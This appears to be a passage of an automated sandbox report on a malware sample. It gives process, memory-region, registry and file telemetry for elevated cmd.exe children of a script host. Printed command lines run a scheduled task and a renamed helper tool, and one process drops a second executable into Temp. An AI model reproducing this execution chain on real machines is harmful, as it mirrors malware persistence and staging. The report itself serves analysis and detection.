| pagefile_0x000000007f6a0000 | 0x7f6a0000 | 0x7f79ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f7a0000 | 0x7f7a0000 | 0x7f7c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f7c5000 | 0x7f7c5000 | 0x7f7c7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f7c8000 | 0x7f7c8000 | 0x7f7cafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f7cb000 | 0x7f7cb000 | 0x7f7cbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f7ce000 | 0x7f7ce000 | 0x7f7cefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #148: cmd.exe
55
0
| Information | Value |
|---|---|
| ID | #148 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:50, Reason: Child Process |
| Unmonitor | End Time: 00:02:58, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf0c |
| Parent PID | 0xcc0 (c:\windows\syswow64\wscript.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
574
0x
7A0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000120000 | 0x00120000 | 0x0013ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x0012ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x00133fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00141fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00143fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00163fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002e0000 | 0x0039dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04980000 | 0x04cb6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ea50000 | 0x7ea50000 | 0x7eb4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eb50000 | 0x7eb50000 | 0x7eb72fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eb73000 | 0x7eb73000 | 0x7eb73fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb79000 | 0x7eb79000 | 0x7eb7bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb7c000 | 0x7eb7c000 | 0x7eb7efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb7f000 | 0x7eb7f000 | 0x7eb7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 135, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\schtasks.exe | os_pid = 0xd50, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #150: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #150 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "PDIALOG.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:50, Reason: Child Process |
| Unmonitor | End Time: 00:03:06, Reason: Self Terminated |
| Monitor Duration | 00:00:16 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5d8 |
| Parent PID | 0xb1c (c:\windows\syswow64\cacls.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
4F0
0x
BFC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x049fffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a00000 | 0x04a00000 | 0x04a1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a00000 | 0x04a00000 | 0x04a0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04a13fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a21fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a23fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a30000 | 0x04a30000 | 0x04a43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a50000 | 0x04a50000 | 0x04a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04b8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b90000 | 0x04b90000 | 0x04b93fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004ba0000 | 0x04ba0000 | 0x04ba0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004bb0000 | 0x04bb0000 | 0x04bb1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bc0000 | 0x04bc0000 | 0x04bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c10000 | 0x04c10000 | 0x04c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04ebffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c20000 | 0x04cddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004ce0000 | 0x04ce0000 | 0x04d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004dc0000 | 0x04dc0000 | 0x04ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x04fbffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04fc0000 | 0x052f6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e7b0000 | 0x7e7b0000 | 0x7e8affff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e8b0000 | 0x7e8b0000 | 0x7e8d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e8d6000 | 0x7e8d6000 | 0x7e8d8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e8d9000 | 0x7e8d9000 | 0x7e8d9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e8dc000 | 0x7e8dc000 | 0x7e8defff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e8df000 | 0x7e8df000 | 0x7e8dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 68, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xcbc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #151: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #151 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "ImagingDevices.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:51, Reason: Child Process |
| Unmonitor | End Time: 00:02:53, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x42c |
| Parent PID | 0x808 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
438
0x
428
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00230000 | 0x00259fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x00950fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000960000 | 0x00960000 | 0x01d5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d60000 | 0x01d60000 | 0x01e9ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x73d90000 | 0x73e21fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
